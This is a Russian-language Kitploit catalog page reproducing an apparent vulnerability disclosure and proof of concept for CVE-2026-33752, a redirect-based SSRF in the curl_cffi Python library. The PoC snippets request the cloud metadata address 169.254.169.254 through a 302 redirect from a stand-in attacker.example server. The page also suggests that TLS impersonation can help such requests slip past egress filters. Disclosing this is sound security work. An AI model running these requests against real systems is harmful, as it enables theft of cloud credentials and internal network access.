Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-33752 — Демонстрирует SSRF-уязвимость на основе перенаправлений в curl_cffi, позволяющую получить доступ к внутренней сети, с PoC-кодом и анализом обхода имитации TLS. | Kitploit
Инструменты/GitHubGitHub/redyank/cve-2026-33752
Анализ уязвимостейЭксплуатацияСбор информацииВеб-безопасностьТестирование на Проникновение
GitHubredyank/cve-2026-33752

CVE-2026-33752

Демонстрирует SSRF-уязвимость на основе перенаправлений в curl_cffi, позволяющую получить доступ к внутренней сети, с PoC-кодом и анализом обхода имитации TLS.

Репозиторий
14 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-33752

CVE-2026-33752 (SSRF на основе перенаправлений, приводящий к доступу к внутренней сети в curl_cffi)

Краткое описание

curl_cffi не ограничивает запросы к внутренним диапазонам IP-адресов и автоматически следует перенаправлениям через базовую библиотеку libcurl.

Из-за этого управляемый атакующим URL-адрес может перенаправлять запросы на внутренние сервисы, такие как конечные точки метаданных облака. Кроме того, функция имитации TLS в curl_cffi может сделать такие запросы похожими на легитимный трафик браузера, что может обойти определённые сетевые средства контроля.

Подробности

Проблема связана с тем, как curl_cffi обрабатывает исходящие запросы

  • URL-адреса, предоставленные пользователем, передаются напрямую в libcurl без проверки того, разрешаются ли они во внутренние диапазоны IP-адресов (например, 127.0.0.1, 169.254.0.0/16).
  • Перенаправления автоматически обрабатываются (CURLOPT_FOLLOWLOCATION = 1) внутри libcurl.
  • На уровне Python не выполняется проверка адресов назначения перенаправлений.

Это означает, что даже если приложение разрешает запросы только к внешним URL-адресам, атакующий может

  • Предоставить URL-адрес, указывающий на сервер, контролируемый атакующим
  • Вернуть ответ с перенаправлением на внутренний сервис
  • Заставить curl_cffi автоматически следовать этому перенаправлению

В результате внутренние конечные точки (такие как API метаданных облачных экземпляров) могут быть доступны.

Кроме того, curl_cffi поддерживает имитацию отпечатка TLS (например, impersonate="chrome"). В средах, где исходящие запросы фильтруются на основе отпечатка TLS, это может затруднить обнаружение или блокировку таких запросов.

Это поведение аналогично ранее сообщённым проблемам SSRF на основе перенаправлений, таким как CVE-2025-68616, где перенаправления позволяли получить доступ к непредусмотренным внутренним ресурсам.

PoC

  1. Прямой запрос к внутреннему ресурсу
root@kitploit:~
import curl_cffi
resp = curl_cffi.get("http://169.254.169.254/latest/meta-data/")
print(resp.text)
  1. Перенаправление на внутренний сервис Сервер атакующего:
root@kitploit:~
GET /test
→ 302 Location: http://169.254.169.254/latest/meta-data/

Код жертвы:

root@kitploit:~
import curl_cffi
resp = curl_cffi.get("https://attacker.example/test")
print(resp.text)

Результат

  • Первоначальный запрос направляется на сервер атакующего
  • Возвращается перенаправление
  • libcurl автоматически следует перенаправлению
  • Внутренняя конечная точка метаданных становится доступной
  1. С имитацией TLS
root@kitploit:~
import curl_cffi\
resp = curl_cffi.get(
    "https://attacker.example/test",
    impersonate="chrome")

В некоторых средах это может помочь запросу обойти средства фильтрации на основе TLS.

Воздействие

Атакующий, который может контролировать запрашиваемый URL-адрес, может:

  • Получить доступ к сервисам внутренней сети
  • Обратиться к конечным точкам метаданных облака и получить конфиденциальную информацию
  • Обойти определённые механизмы фильтрации исходящего трафика (в зависимости от среды) Это соответствует CWE-918 Server-Side Request Forgery (Подделка серверных запросов).
Скачать инструмент